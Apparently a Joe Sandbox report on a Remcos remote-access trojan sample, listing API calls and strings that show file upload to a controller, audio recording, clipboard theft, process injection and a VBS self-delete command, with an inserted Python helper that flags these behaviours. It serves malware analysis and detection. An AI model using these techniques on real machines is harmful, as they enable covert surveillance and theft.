                                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C786
                                                                • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseEnumOpen
                                                                • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                • API String ID: 1332880857-3714951968
                                                                • Opcode ID: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                                                • Opcode Fuzzy Hash: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
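The function blocks above are only API listings, so triage comes down to recognising call combinations: the CopyFileW / SetFileAttributesW(…,00000007) / ShellExecuteW / ExitProcess sequence (self-install with hidden+system attributes), GetModuleHandleW("ntdll.dll", export) paired with GetProcAddress (dynamic resolution of NtAllocateVirtualMemory and friends), WriteFile of the RIFF/WAVE/fmt/data chunk identifiers (a WAV file being written), the `/stext "` string (the NirSoft command-line switch that saves a tool's output as text) and RegOpenKeyExA(HKLM, …\CurrentVersion\Uninstall) followed by RegEnumKeyExA (installed-software inventory). The following Python is an added example written for this page, not part of the Joe Sandbox report or its plugin: it parses the `• Name.MODULE(args), ref: ADDR` and `• String ID:` lines in the format shown above and applies those five rules. The rule names and the behaviour labels are the editor's interpretation; the sample listing is constructed from a subset of the report's own lines.

```python
"""Triage helper for Joe Sandbox 'APIs' function listings (added example)."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

API_LINE = re.compile(
    r"^\s*•\s*(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
STRING_LINE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*)$")

# Documented Win32 constants used by the rules (not report-specific values).
HKEY_LOCAL_MACHINE = 0x80000002
FILE_ATTRIBUTE_HIDDEN, FILE_ATTRIBUTE_SYSTEM = 0x2, 0x4   # 0x7 also sets READONLY (0x1)
WAV_CHUNKS = {"RIFF", "WAVE", "fmt", "data"}


@dataclass
class Call:
    name: str
    module: str
    args: list[str]
    ref: str


@dataclass
class Block:
    calls: list[Call] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)


def parse_blocks(text: str) -> list[Block]:
    """Split a listing into function blocks at each 'APIs' header."""
    blocks: list[Block] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            blocks.append(Block())
            continue
        if not blocks or "Part of subcall function" in line:
            continue  # subcall lines describe another function; skip them
        if m := API_LINE.match(line):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            blocks[-1].calls.append(Call(m["name"], m["module"], args, m["ref"]))
        elif m := STRING_LINE.match(line):
            blocks[-1].strings = [s.strip() for s in m["ids"].split("$") if s.strip()]
    return blocks


def _hex(arg: str) -> int:
    try:
        return int(arg, 16)
    except ValueError:
        return 0  # '?' and symbolic arguments carry no numeric value


def classify(block: Block) -> list[str]:
    """Return behaviour tags (editor's labels) for one function block."""
    tags: list[str] = []
    names = {c.name for c in block.calls}
    hides = any(c.name == "SetFileAttributesW" and len(c.args) >= 2
                and _hex(c.args[1]) & (FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM)
                for c in block.calls)
    if {"CopyFileW", "ShellExecuteW", "ExitProcess"} <= names and hides:
        tags.append("self-install: copies image, hides it, relaunches, exits")
    ntdll = {c.args[1] for c in block.calls
             if c.name == "GetModuleHandleW" and len(c.args) >= 2
             and c.args[0].lower() == "ntdll.dll"}
    if ntdll and "GetProcAddress" in names:
        tags.append("dynamic ntdll resolution: " + ", ".join(sorted(ntdll)))
    if any(c.name.startswith("RegOpenKeyEx") and len(c.args) >= 2
           and _hex(c.args[0]) == HKEY_LOCAL_MACHINE
           and c.args[1].endswith(r"CurrentVersion\Uninstall") for c in block.calls) \
            and any(n.startswith("RegEnumKeyEx") for n in names):
        tags.append("installed-software enumeration via Uninstall key")
    if "WriteFile" in names and WAV_CHUNKS <= set(block.strings):
        tags.append("writes RIFF/WAVE header (audio capture saved to disk)")
    if any(s.startswith("/stext") for s in block.strings):
        tags.append("'/stext' switch present: runs a NirSoft-style recovery tool")
    return tags


def triage(text: str) -> list[tuple[str, list[str]]]:
    """(first API ref, tags) for every block that triggers at least one rule."""
    return [(b.calls[0].ref if b.calls else "?", classify(b))
            for b in parse_blocks(text) if classify(b)]


# Constructed sample: a subset of the report's own listing lines, verbatim.
SAMPLE = r"""APIs
• _wcslen.LIBCMT ref: 0040CE42
• CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000), ref: 0040CFBF
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
• ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
• ExitProcess.KERNEL32 ref: 0040D09D
Strings
• String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
• GetProcAddress.KERNEL32(00000000), ref: 004072E0
• GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
• GetProcAddress.KERNEL32(00000000), ref: 00407330
APIs
• RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
• RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C786
• RegCloseKey.ADVAPI32(?), ref: 0041CA50
APIs
• WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
• WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
• String ID: RIFF$WAVE$data$fmt
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
• DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
• String ID: /stext "$0TG$0TG$NG$NG
"""

if __name__ == "__main__":
    for ref, tags in triage(SAMPLE):
        print(ref, "->", "; ".join(tags))
```

The rules key on argument values rather than API names alone: SetFileAttributesW is common in clean code, but 0x7 (readonly+hidden+system) on a freshly copied image next to ShellExecuteW and ExitProcess is the installer pattern, and RegOpenKeyExA is only flagged when the handle is HKLM, the path ends in `CurrentVersion\Uninstall` and an enumeration call follows. Lines marked "Part of subcall function" are skipped so that a helper's send() does not get attributed to every caller.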
                                                                APIs
                                                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                                • GetCursorPos.USER32(?), ref: 0041D67A
                                                                • SetForegroundWindow.USER32(?), ref: 0041D683
                                                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                                • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                                • ExitProcess.KERNEL32 ref: 0041D6F6
                                                                • CreatePopupMenu.USER32 ref: 0041D6FC
                                                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                • String ID: Close
                                                                • API String ID: 1657328048-3535843008
                                                                • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                                                • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$Info
                                                                • String ID:
                                                                • API String ID: 2509303402-0
                                                                • Opcode ID: d4b587b978178a04d77a312406460529d21981b93c8e51504b7a0db7e668213d
                                                                • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                                • Opcode Fuzzy Hash: d4b587b978178a04d77a312406460529d21981b93c8e51504b7a0db7e668213d
                                                                • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
                                                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                                • __aulldiv.LIBCMT ref: 00408D88
                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                                • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                                • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FE9
                                                                • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                                • API String ID: 3086580692-2582957567
                                                                • Opcode ID: 4f195d3c0c62a6e45262181e9b7fb43f1a1b55c9fe98746a0176ab88057bb64b
                                                                • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                                • Opcode Fuzzy Hash: 4f195d3c0c62a6e45262181e9b7fb43f1a1b55c9fe98746a0176ab88057bb64b
                                                                • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                                APIs
                                                                • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                                • _free.LIBCMT ref: 0045137F
                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                • _free.LIBCMT ref: 004513A1
                                                                • _free.LIBCMT ref: 004513B6
                                                                • _free.LIBCMT ref: 004513C1
                                                                • _free.LIBCMT ref: 004513E3
                                                                • _free.LIBCMT ref: 004513F6
                                                                • _free.LIBCMT ref: 00451404
                                                                • _free.LIBCMT ref: 0045140F
                                                                • _free.LIBCMT ref: 00451447
                                                                • _free.LIBCMT ref: 0045144E
                                                                • _free.LIBCMT ref: 0045146B
                                                                • _free.LIBCMT ref: 00451483
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                • String ID:
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 0041A04A
                                                                • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                                • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                                • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                                 • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                 • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                                APIs
                                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                  • Part of subcall function 00413733: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 0041374F
                                                                  • Part of subcall function 00413733: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                                                  • Part of subcall function 00413733: RegCloseKey.ADVAPI32(00000000), ref: 00413773
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                                • ExitProcess.KERNEL32 ref: 0040D9FF
                                                                 • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                 • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                 • API ID: _free
                                                                 • String ID:
                                                                APIs
                                                                  • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000,?,00455D04,00000000,0000000C), ref: 00455946
                                                                • GetLastError.KERNEL32 ref: 00455D6F
                                                                • __dosmaperr.LIBCMT ref: 00455D76
                                                                • GetFileType.KERNEL32(00000000), ref: 00455D82
                                                                • GetLastError.KERNEL32 ref: 00455D8C
                                                                • __dosmaperr.LIBCMT ref: 00455D95
                                                                • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                                • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                                • GetLastError.KERNEL32 ref: 00455F31
                                                                • __dosmaperr.LIBCMT ref: 00455F38
                                                                 • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                 • String ID: H
                                                                 • API ID: _free
                                                                 • String ID: \&G$\&G$`&G
                                                                 • API ID:
                                                                 • String ID: 65535$udp
                                                                APIs
                                                                • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                                                • TranslateMessage.USER32(?), ref: 0040557E
                                                                • DispatchMessageA.USER32(?), ref: 00405589
                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                 • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                 • String ID: CloseChat$DisplayMessage$GetMessage
                                                                APIs
                                                                  • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                                • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                                • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                 • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                 • String ID: 0VG$0VG$<$@$Temp
                                                                APIs
                                                                • OpenClipboard.USER32 ref: 0041697C
                                                                • EmptyClipboard.USER32 ref: 0041698A
                                                                • CloseClipboard.USER32 ref: 00416990
                                                                • OpenClipboard.USER32 ref: 00416997
                                                                • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                                • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                • CloseClipboard.USER32 ref: 004169BF
                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                 • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                 • String ID: !D@
                                                                APIs
                                                                • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                                • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                                • CloseHandle.KERNEL32(?), ref: 004134A0
                                                                 • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                 • String ID:
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                                 • API ID: Service$CloseHandle$Open$ControlManager
                                                                 • String ID:
                                                                APIs
                                                                • _free.LIBCMT ref: 004481B5
                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                • _free.LIBCMT ref: 004481C1
                                                                • _free.LIBCMT ref: 004481CC
                                                                • _free.LIBCMT ref: 004481D7
                                                                • _free.LIBCMT ref: 004481E2
                                                                • _free.LIBCMT ref: 004481ED
                                                                • _free.LIBCMT ref: 004481F8
                                                                • _free.LIBCMT ref: 00448203
                                                                • _free.LIBCMT ref: 0044820E
                                                                • _free.LIBCMT ref: 0044821C
                                                                 • API ID: _free$ErrorFreeHeapLast
                                                                 • String ID:
                                                                 • API ID: Eventinet_ntoa
                                                                 • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
APIs
• DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
• API ID: DecodePointer
• String ID: acos$asin$exp$log$log10$pow$sqrt
APIs
• ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
• Sleep.KERNEL32(00000064), ref: 0041755C
• DeleteFileW.KERNEL32(00000000), ref: 00417590
• API ID: File$CreateDeleteExecuteShellSleep
• String ID: /t $\sysinfo.txt$dxdiag$open$temp
APIs
• GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
• GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
• API ID: CurrentProcess
• String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
APIs
• _strftime.LIBCMT ref: 00401D50
  • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
• waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
• waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
• waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
• API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
• String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
• int.LIBCPMT ref: 00410EBC
  • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
  • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
• std::_Facet_Register.LIBCPMT ref: 00410EFC
• std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
• __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
• __Init_thread_footer.LIBCMT ref: 00410F64
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
• String ID: ,kG$0kG
APIs
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
• waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
• waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
• waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
• waveInStart.WINMM ref: 00401CFE
• API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
• String ID: dMG$|MG$PG
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
  • Part of subcall function 0041D5A0: RegisterClassExA.USER32(00000030), ref: 0041D5EC
  • Part of subcall function 0041D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
  • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
• ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
• lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
• Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
• TranslateMessage.USER32(?), ref: 0041D57A
• DispatchMessageA.USER32(?), ref: 0041D584
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D591
• API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
• String ID: Remcos
APIs
• GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
• __alloca_probe_16.LIBCMT ref: 00453F6A
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
• __alloca_probe_16.LIBCMT ref: 00454014
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
• __freea.LIBCMT ref: 00454083
• __freea.LIBCMT ref: 0045408F
• API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
• _memcmp.LIBVCRUNTIME ref: 004454A4
• _free.LIBCMT ref: 00445515
• _free.LIBCMT ref: 0044552E
• _free.LIBCMT ref: 00445560
• _free.LIBCMT ref: 00445569
• _free.LIBCMT ref: 00445575
• API ID: _free$ErrorLast$_abort_memcmp
• String ID: C
• String ID: tcp$udp
APIs
• __Init_thread_footer.LIBCMT ref: 004018BE
• ExitThread.KERNEL32 ref: 004018F6
• waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
• API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
• String ID: PkG$XMG$NG$NG
APIs
• CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FB4,?,00000000,00408037,00000000), ref: 00407A00
• WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A48
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
• CloseHandle.KERNEL32(00000000,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A88
• MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
• CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AD0
• DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
  • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
  • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
• API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
• String ID: .part
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                                                • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                                • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                                • __freea.LIBCMT ref: 0044AEB0
                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                • __freea.LIBCMT ref: 0044AEB9
                                                                • __freea.LIBCMT ref: 0044AEDE
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
